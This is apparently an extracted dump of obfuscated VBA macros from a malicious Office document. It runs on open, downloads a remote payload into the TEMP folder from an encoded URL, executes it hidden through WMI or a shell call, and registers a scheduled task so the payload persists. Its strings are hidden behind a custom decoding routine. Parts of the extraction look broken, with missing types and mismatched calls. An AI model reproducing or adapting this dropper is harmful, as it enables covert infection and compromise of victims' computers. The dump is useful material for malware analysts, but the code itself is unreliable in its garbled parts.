stream : Macros/VBA/ThisDocument - 1526 bytes
########################################

Sub AutoOpen()
  NewMacros.Workbook_Open
End Sub
stream : Macros/VBA/NewMacros - 24306 bytes
########################################

Function URLDownloadToFile(ByVal pCaller As Long) As Long
  
  Sub Workbook_Open()
    aFf5DCl
  End Sub
  Sub egGXJxL5nz()
    Dim zgxXtzWi As String
    zgxXtzWi = Environ(Chr(84) & Chr(937 - 868) & Chr(int("&H4d")) & Chr(80)) & SazX46jj(Chr(&H69) & Chr(int("&H50")) & Chr(55) & Chr(-949 + 1050) & Chr(&H56) & Chr(117) & Chr(&H69) & Chr(&H79) & Chr(int("56")) & "V" & Chr(2075 - 1969) & Chr(119) & Chr(&H71) & "l" & Chr(&H77) & Chr(&H56) & Chr(56) & "O" & Chr(112) & Chr(101772 / 1028) & "V" & Chr(int("81")) & Chr(61) & "=")
    If Not Dir(zgxXtzWi, vbDirectory) = vbNullString Then
      Exit Sub
    End If
    Dim Ced7Pn As String
    #If Win64 Then
      Ced7Pn = SazX46jj("oPhSWfo8/Qbyq3BYqC59Urpr+lGyyHEfqt7uVGiy8VjwrlwV6q3UHqjj8lyoOvlUuCreUfho+1GqWpxDsK7wUappuFOi+/dR0qhwVvCqU0U=")
      Ced7Pn = Ced7Pn + Chr(int("108"))
    #End If
    geXy6 = URLDownloadToFile(0, Ced7Pn, zgxXtzWi, 0, 0)
  End Sub
  Public Function aFf5DCl() As Variant
    egGXJxL5nz
    Dim ib1LMED, kedL As String
    Pet8Tz = SazX46jj("Evg5SLrp1VMwrXBRIO9cXvCsd1Viv3laor9TWLguWlXo6V5f")
    ib1LMED = SazX46jj("Evw9TPCsd1Ui/z1aoL1zXuhzM0yquVhXuGLWGaKHWl342F1d") & Environ(Chr(84) & Chr(937 - 868) & Chr(int("&H4d")) & Chr(80)) & SazX46jj("iP7eVuiy8VjwqlwV8KpYFeCj/lTwRFVBuMlMVPKv8xSK4zRToL/wXOI0cBegu/VSsMhQXOg1XR7ik/9VuO/VWbivUlygvnBS6KNUH/Kt/RW44PNd8Kh8FbC68BCwy+Ndkq9YVPjYXV0=") & Pet8Tz & SazX46jj("ooz2QrAlVxVqoWBQEKSoUGDjwFAApaFQALXEVgClqVAK5SBWAKWoUWjzdVEAralRYOHkUACloVko90RQAKygUWqhVVWAJClZIOPAEBCsqFBo8XVRgCQpWUjzZlCAJClZAPX3VwCkoFEqoURUAKWpUKKK+AjSNlJT+HL8XA==")
    q2n4nZ8k5l(ib1LMED)
    KdnbF0
  End Function
  Sub KdnbF0()
    Set FpeceZ5wxyWq = CreateObject(SazX46jj(Chr(int("103")) & Chr(113) & "V" & Chr(int("&H35")) & Chr(int("86")) & "q" & Chr(67) & "/" & Chr(-156 + 243) & Chr(2845 - 2775) & Chr(int("&H57")) & Chr(&H69) & Chr(50) & Chr(int("56")) & Chr(int("&H64")) & Chr(&H51) & "u" & Chr(&H71) & Chr(int("102")) & Chr(81) & "V" & Chr(103) & Chr(1279 - 1218) & "="))
    Call FpeceZ5wxyWq.Connect()
    Dim td: Set td = FpeceZ5wxyWq.NewTask(0)
    td.RegistrationInfo.Author = SazX46jj("m" & Chr(int("&H4f")) & Chr(-878 + 958) & Chr(&H32) & "U" & Chr(75) & Chr(-2899 + 3012) & Chr(int("55")) & Chr(int("47")) & Chr(2158 - 2109) & Chr(int("&H52")) & Chr(1501 - 1390) & Chr(int("112")) & Chr(476 - 360) & Chr(-1634 + 1716) & Chr(int("71")) & Chr(113) & Chr(&H76) & Chr(int("106")) & Chr(99) & Chr(int("&H55")) & Chr(int("&H75")) & Chr(int("&H43")) & Chr(&H30) & Chr(47) & Chr(int("&H46")) & Chr(88) & Chr(8301 - 8247) & Chr(&H2B) & Chr(int("108")) & "9" & Chr(&H64))
    td.RegistrationInfo.Description = SazX46jj("au1hUSCmzFVAtcFSGOhzGwD110Z4/llQ6vj1QKKhTV04+lEQKORgEaBmzV3Y4uZQeqx9VYD2f0hY+FdSAPzfRsjr51nyJHFZ")
    td.settings.StartWhenAvailable = True
    td.settings.Hidden = False
    Dim SjjH: Set SjjH = td.triggers
    Dim JBnC4fVEA: Set JBnC4fVEA = SjjH.Create(1)
    Dim TEHyxi: ts = DateAdd(Chr(int("&H64")), 1, Now)
    TEHyxi = SazX46jj(Chr(&H71) & Chr(int("&H6c")) & Chr(int("&H42")) & Chr(85) & Chr(67) & Chr(int("&H75")) & Chr(&H67) & "W" & Chr(&H63) & Chr(103) & Chr(&H77) & Chr(&H69) & "2" & Chr(&H46) & "U" & Chr(75) & Chr(2225 - 2108) & Chr(108) & Chr(&H42) & Chr(int("86")) & Chr(int("&H43")) & Chr(int("117")) & Chr(int("&H70")) & Chr(81) & Chr(86) & "0" & Chr(31356 / 603) & Chr(61))
    JBnC4fVEA.StartBoundary = TEHyxi
    JBnC4fVEA.ID = SazX46jj(Chr(79326 / 678) & Chr(75) & Chr(-265 + 312) & Chr(int("85")) & Chr(4470 - 4384) & Chr(int("&H75")) & Chr(7501 - 7398) & Chr(43) & "O" & Chr(86) & Chr(int("68")) & "Y" & Chr(int("43")) & "l" & Chr(&H31) & Chr(int("&H64")))
    Dim fU0wdOnfj: Set fU0wdOnfj = td.Actions.Create(0)
    fU0wdOnfj.Path = SazX46jj("Evg5SLrp1VMwrXBRIO9cXvCsd1Viv3laor9TWLguWlXo6V5f")
    Call FpeceZ5wxyWq.GetFolder(Chr(92)).RegisterTaskDefinition(SazX46jj(Chr(109) & Chr(int("113")) & Chr(int("&H74")) & Chr(int("52")) & Chr(int("&H56")) & Chr(37403 / 331) & Chr(1485 - 1372) & Chr(&H7A) & Chr(56) & Chr(-1737 + 1857) & Chr(int("109")) & Chr(int("&H41")) & Chr(int("&H76")) & Chr(int("&H6e")) & "B" & Chr(int("&H53")) & Chr(int("54")) & Chr(79) & Chr(116) & "c" & "X" & Chr(&H77) & Chr(int("61")) & Chr(182817 / 2997)), td, 6, , , 3)
  End Sub
  Sub q2n4nZ8k5l(B8OqGQl3Qs8 As String)
    On Error Resume Next
    Err.Clear
    sLvKHipjRWhY = Ruyw5Qxt0QI(B8OqGQl3Qs8)
    If Err.Number <> 0 Or sLvKHipjRWhY <> 0 Then
      Err.Clear
      p2a4UDrsYo B8OqGQl3Qs8
    End If
    On Error GoTo 0
  End Sub
  Function Ruyw5Qxt0QI(GZn9Xen As String) As Integer
    Set gD9rl14 = GetObject(SazX46jj(Chr(43) & Chr(113) & "9" & Chr(&H34) & Chr(86) & "r" & Chr(4582 - 4506) & Chr(int("118")) & Chr(int("&H64")) & Chr(&H46) & Chr(&H6C) & Chr(121) & Chr(109) & Chr(11592 / 168) & Chr(int("52")) & Chr(int("&H66")) & Chr(int("121")) & Chr(76) & "7" & "f" & Chr(&H56) & Chr(1568 - 1450) & Chr(int("105")) & Chr(&H32) & Chr(int("119")) & Chr(int("&H46")) & "P" & Chr(int("&H6f")) & Chr(int("99")) & Chr(110) & Chr(&H64) & Chr(int("&H64"))))
    Set i7yZkHl = gD9rl14.Get(SazX46jj(Chr(&H6D) & Chr(117) & Chr(&H39) & Chr(int("&H38")) & Chr(int("69")) & "j" & Chr(3793 - 3717) & Chr(82) & Chr(-864 + 946) & Chr(int("86")) & Chr(int("117")) & "i" & Chr(55) & Chr(&H2F) & Chr(2531 - 2431) & Chr(&H51) & Chr(int("111")) & Chr(int("114")) & Chr(int("&H31")) & Chr(int("&H68")) & Chr(2411 - 2324) & Chr(113) & Chr(&H4C) & "4" & Chr(1280 - 1232) & Chr(70) & Chr(int("&H73")) & Chr(9094 - 9033)))
    Set q2fpw = i7yZkHl.SpawnInstance_
    q2fpw.ShowWindow = 0
    Set dfHxvyUQe = GetObject(SazX46jj("+q94VrLvdFlymE4fyL7fVvi2wFPocncZmu98EjLRRVui7/dQ+vh9Xw=="))
    Ruyw5Qxt0QI = dfHxvyUQe.Create(GZn9Xen, Null, q2fpw, intProcessID)
  End Function
  Sub p2a4UDrsYo(GZn9Xen As String)
    CreateObject(SazX46jj(Chr(int("105")) & Chr(int("&H76")) & Chr(1117 - 1037) & Chr(&H6C) & "U" & Chr(4679 - 4562) & Chr(67) & "4" & Chr(int("&H64")) & Chr(int("104")) & Chr(122) & Chr(int("&H53")) & Chr(113) & Chr(560 - 480) & Chr(66) & Chr(int("&H57")) & Chr(&H2B) & Chr(int("&H50")) & Chr(int("112")) & Chr(int("&H66")) & Chr(107008 / 1216) & "Q" & "=" & Chr(507 - 446))).Run GZn9Xen, 0
  End Sub
  Public Function qs0a(ByVal MY7mIZHtJYn As Long) As Long
    qs0a = MY7mIZHtJYn
    If yeyEJRa2 > 0 Then
      If MY7mIZHtJYn > 0 Then
        qs0a = int(qs0a / (2 ^ yeyEJRa2))
      Else
        If yeyEJRa2 > 31 Then
          qs0a = 0
        Else
          qs0a = qs0a And &H7FFFFFFF
          qs0a = int(qs0a / (2 ^ yeyEJRa2))
          qs0a = qs0a Or 2 ^ (31 - yeyEJRa2)
        End If
      End If
    End If
  End Function
  Public Function cMr0Rr(ByVal MY7mIZHtJYn As Long) As Long
    cMr0Rr = MY7mIZHtJYn
    If yeyEJRa2 > 0 Then
      Dim i As Byte
      Dim m As Long
      For i = 1 To yeyEJRa2
        m = cMr0Rr And &H40000000
        cMr0Rr = (cMr0Rr And &H3FFFFFFF) * 2
        If m <> 0 Then
          cMr0Rr = cMr0Rr Or &H80000000
        End If
      Next i
    End If
  End Function
  Public Function qerV2Vm(ByVal AxfkuUq As Long) As Long
    Const qQz6 As Long = 5570645
    Const GV3upFY4TL As Long = 52428
    Const d1 = 7
    Const d2 = 14
    Dim t As Long, u, out As Long
    t = (AxfkuUq Xor qs0a(AxfkuUq, d2)) And GV3upFY4TL
    u = AxfkuUq Xor t Xor cMr0Rr(t, d2)
    t = (u Xor qs0a(u, d1)) And qQz6
    out = (u Xor t Xor cMr0Rr(t, d1))
    qerV2Vm = out
  End Function
  Public Function L0p7(ByRef iRJ0qO As ) As String
    Dim i, fr, UNK6FopTzqQO, raw As Long
    Dim a As String, B As String, c As String, d As String
    Dim kJ6YU As String
    Dim hF95IT75OEc
    Dim a2, b2 As String
    kJ6YU = ""
    For i = 0 To (UBound(iRJ0qO) / 4 + 1)
      fr = i * 4
      If fr > UBound(iRJ0qO) Then
        Exit For
      End If
      UNK6FopTzqQO = 0
      UNK6FopTzqQO = UNK6FopTzqQO Or cMr0Rr(iRJ0qO(fr + 3), 24)
      UNK6FopTzqQO = UNK6FopTzqQO Or cMr0Rr(iRJ0qO(fr + 2), 16)
      UNK6FopTzqQO = UNK6FopTzqQO Or cMr0Rr(iRJ0qO(fr + 1), 8)
      UNK6FopTzqQO = UNK6FopTzqQO Or iRJ0qO(fr + 0)
      raw = qerV2Vm(UNK6FopTzqQO)
      a = Chr(qs0a((raw And &HFF000000), 24))
      B = Chr(qs0a((raw And 16711680), 16))
      c = Chr(qs0a((raw And 65280), 8))
      d = Chr(qs0a((raw And 255), 0))
      kJ6YU = kJ6YU + d + c + B + a
    Next i
    L0p7 = kJ6YU
  End Function
  Public Function SazX46jj(iRJ0qO As String) As String
    Dim Y6ZHNpf, ZHen, arrayByte3(255)
    Dim CZBj(63), arrayLong5(63)
    Dim mytH36A3Z(63), sihUSBK2 As Long
    Dim OVO78Jj As Integer, iter As Long, mZhxZr As Long, S1MchI As Long
    Dim kJ6YU As String
    iRJ0qO = Replace(iRJ0qO, vbCr, vbNullString)
    iRJ0qO = Replace(iRJ0qO, vbLf, vbNullString)
    S1MchI = Len(iRJ0qO) Mod 4
    If InStrRev(iRJ0qO, "==") Then
      OVO78Jj = 2
    ElseIf InStrRev(iRJ0qO, "" + "=") Then
      OVO78Jj = 1
    End If
    For S1MchI = 0 To 255
      Select Case S1MchI
        Case 65 To 90
        arrayByte3(S1MchI) = S1MchI - 65
        Case 97 To 122
        arrayByte3(S1MchI) = S1MchI - 71
        Case 48 To 57
        arrayByte3(S1MchI) = S1MchI + 4
        Case 43
        arrayByte3(S1MchI) = 62
        Case 47
        arrayByte3(S1MchI) = 63
      End Select
    Next S1MchI
    For S1MchI = 0 To 63
      CZBj(S1MchI) = S1MchI * 64
      arrayLong5(S1MchI) = S1MchI * 4096
      mytH36A3Z(S1MchI) = S1MchI * 262144
    Next S1MchI
    ZHen = StrConv(iRJ0qO, vbFromUnicode)
    ReDim Y6ZHNpf((((UBound(ZHen) + 1) \ 4) * 3) - 1)
    For iter = 0 To UBound(ZHen) Step 4
      sihUSBK2 = mytH36A3Z(arrayByte3(ZHen(iter))) + arrayLong5(arrayByte3(ZHen(iter + 1))) + CZBj(arrayByte3(ZHen(iter + 2))) + arrayByte3(ZHen(iter + 3))
      S1MchI = sihUSBK2 And 16711680
      Y6ZHNpf(mZhxZr) = S1MchI \ 65536
      S1MchI = sihUSBK2 And 65280
      Y6ZHNpf(mZhxZr + 1) = S1MchI \ 256
      Y6ZHNpf(mZhxZr + 2) = sihUSBK2 And 255
      mZhxZr = mZhxZr + 3
    Next iter
    kJ6YU = StrConv(Y6ZHNpf, vbUnicode)
    If OVO78Jj Then kJ6YU = Left$(kJ6YU, Len(kJ6YU) - OVO78Jj)
    SazX46jj = L0p7(StrConv(kJ6YU, vbFromUnicode))
    SazX46jj = s6VZMCG(SazX46jj, "~")
  End Function
  Function s6VZMCG(dA96Oqa As String) As String
    Dim OfQe1 As Long
    Dim DBrq
    DBrq = Split(dA96Oqa, L5tZu0VDa91S)
    OfQe1 = UBound(DBrq, 1)
    If OfQe1 <> 0 Then
      dA96Oqa = Left$(dA96Oqa, Len(dA96Oqa) - OfQe1)
    End If
    s6VZMCG = dA96Oqa
  End Function
  

